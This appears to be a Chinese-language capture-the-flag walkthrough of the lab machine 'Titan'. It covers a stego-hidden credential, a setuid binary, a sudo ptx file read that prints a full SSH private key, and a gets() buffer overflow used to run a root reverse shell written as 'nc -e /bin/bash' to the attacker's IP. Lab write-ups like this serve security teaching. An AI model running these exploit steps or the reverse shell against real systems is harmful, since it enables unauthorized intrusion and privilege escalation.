Titan

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/Titan]
└─$ rustscan -a $IP -- -A          
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.148:22
Open 192.168.0.148:80
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:fa:d2:9f:20:25:cf:c5:96:7a:dc:f3:ff:2c:7a:22 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDml2HF7iP3bZiffqDOUsnz3xgszbesm07OahEGoD9u6/fWRoej43kEC1GVaXrAo5WJg1qXkw7LoobPIJYdC759s4WGD1uv7SM8OpDaWmoPMSXhDjmYlcHlmEgKJZscvAWQJyYeml+uDCzRfXeR1HhZRQ3LAdX7DOAEsyt0ZSA+nxYbps9jj4l7fqtfIDCwKCIKpFYRj3ptjjQFqcQHtXPSzB6yA3oJ94Xaq4WH6FjHgI6z10QqOlnzhYaGZlvkUPFzobdJOG9LxdvT9/R+JUpeXM4GLjMxabwB/RVGaerlPnheKXU127hi5ymFRCbiSU79K2HtS7kZE3ccilu363Kv
|   256 11:ad:fa:95:71:c5:f9:d4:97:da:42:03:2b:0f:55:bb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEbvTwDvgKKTdJ2lrlA4fJQGebxPAM+IeugLQGPsC7mbwbiLL5w2F4V/lm/AeulU90tZ3O/ILYgccXSnqkS2D9o=
|   256 fa:fb:04:13:93:90:a5:01:53:ba:6c:e9:bf:dc:bf:7e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGjIqwQs8howaGNI7JxBiDYSDLmITIC2qb8KRDns/w2r
80/tcp open  http    syn-ack nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录爆破

┌──(kali💀kali)-[~/temp/Titan]
└─$ feroxbuster -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -d 3 -s 200 301 302 
                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.2
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.0.148/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.2
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 3
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       92l      348w    35203c http://192.168.0.148/prometheus.jpg
200      GET        1l        4w       54c http://192.168.0.148/
[####################] - 2m    220547/220547  0s      found:2       errors:0      
[####################] - 2m    220546/220546  1560/s  http://192.168.0.148/

漏洞利用

踩点

就一张照片，给他下过来看看有啥隐藏信息：

┌──(kali💀kali)-[~/temp/Titan]
└─$ stegseek prometheus.jpg                             
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.54% (132.8 MB)           
[!] error: Could not find a valid passphrase.

敏感目录探测

http://192.168.0.148/robots.txt
/athena.txt

http://192.168.0.148//athena.txt
Titan! to whose immortal eyes	 	    	   	 	   	     
The sufferings of mortality,   	   	  	      		       	    
Seen in their sad reality,     	   		     	       	    	    
Were not as things that gods despise;     	       	      	    	   
What was thy pity's recompense?      	 	  	     	       	      
A silent suffering, and intense;       		       	      	   	       
The rock, the vulture, and the chain,    	  	    		
All that the proud can feel of pain,	
The agony they do not show,
The suffocating sense of woe,
Which speaks but in its loneliness,
And then is jealous lest the sky
Should have a listener, nor will sigh
Until its voice is echoless.
Titan! to thee the strife was given
Between the suffering and the will,
Which torture where they cannot kill;
And the inexorable Heaven,
And the deaf tyranny of Fate,
The ruling principle of Hate,
Which for its pleasure doth create
The things it may annihilate,
Refus'd thee even the boon to die:
The wretched gift Eternity
Was thine鈥攁nd thou hast borne it well.
All that the Thunderer wrung from thee
Was but the menace which flung back
On him the torments of thy rack;
The fate thou didst so well foresee,
But would not to appease him tell;
And in thy Silence was his Sentence,
And in his Soul a vain repentance,
And evil dread so ill dissembled,
That in his hand the lightnings trembled.
Thy Godlike crime was to be kind,
To render with thy precepts less
The sum of human wretchedness,
And strengthen Man with his own mind;
But baffled as thou wert from high,
Still in thy patient energy,
In the endurance, and repulse
Of thine impenetrable Spirit,
Which Earth and Heaven could not convulse,
A mighty lesson we inherit:
Thou art a symbol and a sign
To Mortals of their fate and force;
Like thee, Man is in part divine,
A troubled stream from a pure source;
And Man in portions can foresee
His own funereal destiny;
His wretchedness, and his resistance,
And his sad unallied existence:
To which his Spirit may oppose
Itself鈥攁nd equal to all woes,
And a firm will, and a deep sense,
Which even in torture can descry
Its own concenter'd recompense,
Triumphant where it dares defy,
And making Death a Victory.

复制发现部分空白，可能有隐藏信息：

┌──(kali💀kali)-[~/temp/Titan]
└─$ wget http://$IP/athena.txt              
--2024-07-07 00:53:40--  http://192.168.0.148/athena.txt
Connecting to 192.168.0.148:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2170 (2.1K) [text/plain]
Saving to: ‘athena.txt’

athena.txt                           100%[=====================================================================>]   2.12K  --.-KB/s    in 0s      

2024-07-07 00:53:40 (138 MB/s) - ‘athena.txt’ saved [2170/2170]

┌──(kali💀kali)-[~/temp/Titan]
└─$ stegsnow -h                        
Usage: stegsnow [-C] [-Q] [-S] [-V | --version] [-h | --help]
        [-p passwd] [-l line-len] [-f file | -m message]
        [infile [outfile]]

┌──(kali💀kali)-[~/temp/Titan]
└─$ stegsnow -C athena.txt 
prometheus/iloveallhumans

尝试ssh连接一下：

提权

信息搜集

prometheus@titan:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for prometheus: 
Sorry, try again.
[sudo] password for prometheus: 
Sorry, user prometheus may not run sudo on titan.
prometheus@titan:~$ ls -la
total 40
drwxr-xr-x 2 prometheus prometheus  4096 Aug  9  2021 .
drwxr-xr-x 5 root       root        4096 Aug  9  2021 ..
-rw-r--r-- 1 prometheus prometheus   220 Aug  9  2021 .bash_logout
-rw-r--r-- 1 prometheus prometheus  3526 Aug  9  2021 .bashrc
-rw-r--r-- 1 prometheus prometheus   807 Aug  9  2021 .profile
-rwsr-sr-x 1 root       prometheus 16896 Aug  9  2021 sacrifice
prometheus@titan:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
zeus:x:1000:1000:zeus,,,:/home/zeus:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
prometheus:x:1001:1001:,,,:/home/prometheus:/bin/bash
hesiod:x:1002:1002:,,,:/home/hesiod:/bin/bash
prometheus@titan:~$ ./sacrifice
What is your offer to the gods?whoami
Thanks, mortal.prometheus@titan:~$ whoami;id
prometheus
uid=1001(prometheus) gid=1001(prometheus) groups=1001(prometheus)
prometheus@titan:~$ strings sacrifice 
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
gets
printf
system
__cxa_finalize
setgid
strcmp
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/home/hesiod/fire
What is your offer to the gods?
beef
Take this gift.
/bin/bash
Thanks, mortal.
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sacrifice.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
thief
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
strcmp@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
gets@@GLIBC_2.2.5
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

提权用户

发现存在setuid等敏感函数，尝试传过来分析一下：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s1; // [rsp+10h] [rbp-50h]
  int v5; // [rsp+58h] [rbp-8h]
  int v6; // [rsp+5Ch] [rbp-4h]

  v6 = 1000;
  printf("What is your offer to the gods?", argv, envp, argv);
  gets(&s1);
  v5 = strcmp(&s1, "beef");
  if ( v5 )
  {
    printf("Thanks, mortal.", "beef");
  }
  else
  {
    setuid(0x3E8u);
    setgid(0x3E8u);
    printf("Take this gift.", "beef");
    system("/bin/bash");
  }
  return 0;
}

发现如果输入与beef比较，如果结果为真，可以访问特殊用户，转为字符串以后是1000，尝试利用一下

sudo ptx提权

参考 https://gtfobins.github.io/gtfobins/ptx/#sudo 进行进一步提权：

zeus@titan:~$ whoami;id
zeus
uid=1000(zeus) gid=1001(prometheus) groups=1001(prometheus)
zeus@titan:~$ sudo -l
Matching Defaults entries for zeus on titan:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on titan:
    (hesiod) NOPASSWD: /usr/bin/ptx
zeus@titan:~$ cd ~
zeus@titan:~$ ls -la
total 40
drwxr-xr-x 2 prometheus prometheus  4096 Aug  9  2021 .
drwxr-xr-x 5 root       root        4096 Aug  9  2021 ..
-rw-r--r-- 1 prometheus prometheus   220 Aug  9  2021 .bash_logout
-rw-r--r-- 1 prometheus prometheus  3526 Aug  9  2021 .bashrc
-rw-r--r-- 1 prometheus prometheus   807 Aug  9  2021 .profile
-rwsr-sr-x 1 root       prometheus 16896 Aug  9  2021 sacrifice
zeus@titan:~$ cd ../zeus/
zeus@titan:/home/zeus$ ls -la
total 32
drwxr-xr-x 3 zeus zeus 4096 Aug  9  2021 .
drwxr-xr-x 5 root root 4096 Aug  9  2021 ..
-rw-r--r-- 1 zeus zeus  220 Aug  9  2021 .bash_logout
-rw-r--r-- 1 zeus zeus 3526 Aug  9  2021 .bashrc
drwxr-xr-x 3 zeus zeus 4096 Aug  9  2021 .local
-rw-r--r-- 1 zeus zeus  807 Aug  9  2021 .profile
-rw------- 1 zeus zeus   16 Aug  9  2021 user.txt
-rw------- 1 zeus zeus   51 Aug  9  2021 .Xauthority
zeus@titan:/home/zeus$ cat user.txt 
HMVolympiangods
zeus@titan:/home/zeus$ cd ../hesiod/
zeus@titan:/home/hesiod$ ls -la
total 48
drwxr-xr-x 4 hesiod hesiod  4096 Aug  9  2021 .
drwxr-xr-x 5 root   root    4096 Aug  9  2021 ..
-rw-r--r-- 1 hesiod hesiod   220 Aug  9  2021 .bash_logout
-rw-r--r-- 1 hesiod hesiod  3526 Aug  9  2021 .bashrc
-rwxr-x--- 1 hesiod hesiod 16608 Aug  9  2021 fire
drwxr-xr-x 3 hesiod hesiod  4096 Aug  9  2021 .local
-rw-r--r-- 1 hesiod hesiod   807 Aug  9  2021 .profile
drwx------ 2 hesiod hesiod  4096 Aug  9  2021 .ssh
zeus@titan:/home/hesiod$ cd .ssh
bash: cd: .ssh: Permission denied
zeus@titan:/home/hesiod$ sudo -u hesiod ptx -w 5000 /home/hesiod/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA0ikMjqBt6UlIVL1e2xxw374gEG33Y0+upVqDXNmNQIn64kJVUj8Q
Cr9BBuObFMLoYe1vjApycVrS9YppYXQsqlttfDQ5bt0lT8JdS0lcsJW4CLUASlYcVe2XAk
8yf89XliCJzlUWX+SIGCiDUZhzMbOGRNM9B1h/Gfi31i7tjCPKhNdlxuOq47x7Gy3TNmur
lspSJJ7OSdVKfOiCqBduddhn2qV2FSgCSv41XFgbdiI8AFw/3pS3TpbJhKqDip1tsphtG5
vmr2FfeFzjbAyLJzx23444Var8aHHoEsLVepL8HKEBwSkrdOPMwUFoLQ5yWOlzDUP1AlBk
3txyEx0HNwAAA8i8aOjVvGjo1QAAAAdzc2gtcnNhAAABAQDSKQyOoG3pSUhUvV7bHHDfvi
AQbfdjT66lWoNc2Y1AifriQlVSPxAKv0EG45sUwuhh7W+MCnJxWtL1imlhdCyqW218NDlu
3SVPwl1LSVywlbgItQBKVhxV7ZcCTzJ/z1eWIInOVRZf5IgYKINRmHMxs4ZE0z0HWH8Z+L
fWLu2MI8qE12XG46rjvHsbLdM2a6uWylIkns5J1Up86IKoF2512GfapXYVKAJK/jVcWBt2
IjwAXD/elLdOlsmEqoOKnW2ymG0bm+avYV94XONsDIsnPHbfjjhVqvxocegSwtV6kvwcoQ
HBKSt048zBQWgtDnJY6XMNQ/UCUGTe3HITHQc3AAAAAwEAAQAAAQEAqcFglECAJ4T7OP+y
BBjoD8KaUcsRnhV6A7SmETTlRPFvRp3AH2wzAAtWckMdPFrnrFpG1P6HTIrJhm6kCoT1oz
GwsTfaAHP/NHrSMwLyLOzyt43Ey0bdIoeEh+gC6XxIykpEJfdS2GhXifQHhrw2qDnTxfo+
/JT+LbNag1ZqqNu02YET846I1xppdx/gYK5/hW19Shrw0F+V+G2U0AaVxfgFb+B2Sz+QER
Sd9AXibnZNP1yv9P62Bqg/hxkSDpbfKeWx0uGnPWYx2I3zCGF5tEsUye0QxfRPYdZONBSi
LHsNG9iM01yI7/6K0FHDuMPOnCKztcxiOXVcMtcG1mhRQQAAAIAftEnw6wQo/Cy034TA9h
W1KLRThw9qqrOQdHlpjk/RtaAcVbAOTO5ugVf7oECfgnmyuwRoGWN0GFoSgsEkS2QwtP5/
1CN9aGIHxRRyD/KEddj5RhByx0SYhdioveguFQtC/j+dof0uz1uHZof9hQeZp4deOdhNRU
0+M01pQ1jsiwAAAIEA9ei0q+vG4voP14uBS/+ZXWAO8SOSrsFJcFtxGYHp1ZWkEmKEZ4Yi
xUBZ868cu5Flrby84V8UpiXE+tPyq5bZUw24nlJTURFzqy0LkAcAtKQVihXaaoAlOJvz7z
PC+9o5LKVwNRZlD35W0N622PMj7UYrWK2564W3zpTIHSmCjuEAAACBANrIzPuNywmCWnWG
fSSraCkaaaNxMQ49EeSWAUl3ShO0t0FWdjoAVP2+5xgIBckN2lxqvGSUDzcrCvKrAkNXNm
wHddlQ7yDx4NgmKMnAr06EZ9Ue7AS3jwOtDOIxijvqjqPidokINYjhXfNV7cJEWXgKZ2ez
xqQSsiROLKN/zVEXAAAADGhlc2lvZEB0aXRhbgECAwQFBg== 
-----END OPENSSH PRIVATE KEY-----

可以链接上去了：

提权root

hesiod@titan:~$ ls -la
total 48
drwxr-xr-x 4 hesiod hesiod  4096 Aug  9  2021 .
drwxr-xr-x 5 root   root    4096 Aug  9  2021 ..
-rw-r--r-- 1 hesiod hesiod   220 Aug  9  2021 .bash_logout
-rw-r--r-- 1 hesiod hesiod  3526 Aug  9  2021 .bashrc
-rwxr-x--- 1 hesiod hesiod 16608 Aug  9  2021 fire
drwxr-xr-x 3 hesiod hesiod  4096 Aug  9  2021 .local
-rw-r--r-- 1 hesiod hesiod   807 Aug  9  2021 .profile
drwx------ 2 hesiod hesiod  4096 Aug  9  2021 .ssh
hesiod@titan:~$ file fire
fire: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=184895251a592fca9d0455208637afd5ac2d4e7b, not stripped

尝试传到本地看一下啥情况：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  return puts("Here is the fire...");
}

运行一下试试。。。。。

hesiod@titan:~$ ./fire
Here is the fire...

啊啊啊啊啊啊啊啊（发出了尖锐的爆鸣声）到处翻翻，前面的sacrifice程序存在一个永远无法执行的函数（正常情况下）

int thief()
{
  setuid(0);
  setgid(0);
  return system("/home/hesiod/fire");
}

正好home/hesiod/fire可以进行覆写。

hesiod@titan:~$ echo '#!/bin/bash' > fire
hesiod@titan:~$ echo 'nc -e /bin/bash 192.168.0.143 2345' >> fire
hesiod@titan:~$ cat fire
#!/bin/bash
nc -e /bin/bash 192.168.0.143 2345

现在肯定不能执行的，本地尝试调试一下，编写exploit，传过去利用一下：

┌──(kali💀kali)-[~/temp/Titan]
└─$ ls -la                                                                                                             
total 56
drwxr-xr-x   2 kali kali  4096 Jul  7 01:38 .
drwxr-xr-x 101 kali kali  4096 Jul  7 00:39 ..
-rw-r--r--   1 kali kali  2170 Aug  9  2021 athena.txt
-rw-r--r--   1 kali kali 22896 Aug  9  2021 prometheus.jpg
-rw-r--r--   1 kali kali 16896 Jul  7 01:38 sacrifice

┌──(kali💀kali)-[~/temp/Titan]
└─$ chmod +x sacrifice 

┌──(kali💀kali)-[~/temp/Titan]
└─$ gdb-pwndbg ./sacrifice                                                                                             
Reading symbols from ./sacrifice...
(No debugging symbols found in ./sacrifice)
pwndbg: loaded 156 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $ida GDB functions (can be used with print/break)
------- tip of the day (disable with set show-tips off) -------
GDB's set directories <path> parameter can be used to debug e.g. glibc sources like the malloc/free functions!
pwndbg> run
Starting program: /home/kali/temp/Titan/sacrifice 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
What is your offer to the gods?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Program received signal SIGSEGV, Segmentation fault.

爆了段错误，说明存在溢出漏洞，尝试进行测试偏移量，先关掉本地的ASLR：

┌──(kali💀kali)-[~/temp/Titan]
└─$ sudo su                                          
[sudo] password for kali: 
┌──(root㉿kali)-[/home/kali/temp/Titan]
└─# cat /proc/sys/kernel/randomize_va_space
2

┌──(root㉿kali)-[/home/kali/temp/Titan]
└─# echo 0 > /proc/sys/kernel/randomize_va_space  

┌──(root㉿kali)-[/home/kali/temp/Titan]
└─# cat /proc/sys/kernel/randomize_va_space     
0

尝试进行调试：

发现偏移量为88，尝试搜索相关函数：

尝试进行填充，使其运行 thief 函数：

hesiod@titan:~$ python3 -c 'print("A" * 87 + "\x85\x51\x55\x55\x55\x55\x00\x00")' | /home/prometheus/sacrifice
stty: 'standard input': Inappropriate ioctl for device
bash: line 13: ifconfig: command not found

发现弹过来了：

参考

https://www.bilibili.com/video/BV1z642137no

https://nepcodex.com/2021/08/writeup-of-titan-from-hackvyvm-walkthrough/